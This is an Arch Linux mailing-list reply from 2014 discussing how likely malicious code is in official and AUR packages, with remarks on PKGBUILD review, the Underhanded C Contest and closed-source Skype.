Alexander, I'll post a link to your response wherever I can. Awesome explanation. Cheers, Eu. El 06/08/2014 15:44, "Alexander Rødseth" <rodseth@gmail.com> escribió:
Hi,
When people install popular packages from AUR, I think the chances are low that there is anything malicious there, because of the number of people that will have read the PKGBUILD.
Of course, if upstream includes something malicious deep into the source in a tarball, it could be somewhat harder to discover, but I think this is unlikely. If someone would want to do this, they would first have to either create a package with malicious components and then try to make it popular (which is hard) or try to sneak in a patch for an existing project, which is also hard. The number of obstacles and number of eyes to pass by is relatively high (should be high enough for someone to notice), and the malicious people would have to be patient. I may be filled with prejudice towards malicious people, but I believe them to be less patient than the average non-malicious person.
I also think the official packages are safe. The number of steps a malicious person would have to go through is high, and there is much checking of what TUs/devs do from both other TUs/devs and the public.
Extreme patience and sneakiness would have to be employed for someone to even be a little bit malicious with the most popular AUR packages or the official packages. And even then, there are the filesystem permissions, and other security measures in Linux, to overcome if a malicious person is to do anything worthwhile (to the degree that maliciousness could be worthwhile). People may even have installed more fine grained security with something like SELinux, which would render the endeavor even harder to accomplish.
The unpopular AUR packages are a completely different story. There would be few eyes on both the upstream code and the PKGBUILDs and it would be extremely easy to try to do something malicious. However, just one dedicated Arch Linux user should be enough to check if it did anything malicious, at least for types of maliciousness that is easy to notice for the user, like deleting files or filling the harddrive with pictures of ponies.
Of course, if the upstream sources was from a respected company or organization, it would be easy to read the PKGBUILD and unlikely that the sources contained anything malicious.
Back to the question: I don't know and haven't heard of any cases of actual malice in any Arch Linux packages, neither official ones, nor unofficial ones in AUR.
The worst case I encountered was an AUR package made by someone clueless that cluttered all sorts of directories with misplaced files at install time. This probably does not qualify as malicious, and the package was swiftly removed from AUR.
When it comes to the safety of code, it can be really hard to tell if it is malicious or safe just by reading it. There is a competition called "The Underhanded C Contest" where people contend in hiding code in code: http://underhanded.xcott.com/. And that's only for the packages where the source is open! Who knows what upstream projects with only binary files available might do.
The official Skype package has no available sources, only binary files. According to a recent article by Ars Technica, Skype is vital to NSA surveillance:
http://arstechnica.com/security/2014/05/encrypted-or-not-skype-communication... . The likelyhood that Skype is malicious in other ways than this is probably low, but how can we know for sure? Even with the source code, it would take quite a bit of time and effort to be 100% sure (ref. the Underhanded C Contest).
If malicious and unpopular AUR packages would ever become a problem, we could have some sort of required vetting (of the users and/or packages in question) before the packages were made public. I really hope it doesn't come to that. It would just be more work for everybody involved, with little gains for the potentially malicious people.
One would think that the computers that the serious, malicious, sneaky and patient people would target, would rather be the faster and more well connected computers in the world, which are hopefully run by people that care about security and won't install random packages from AUR on their servers.
For now, I think the official packages and popular AUR packages are safe, but be careful with the unpopular AUR packages.
-- Cheers, Alexander Rødseth / xyproto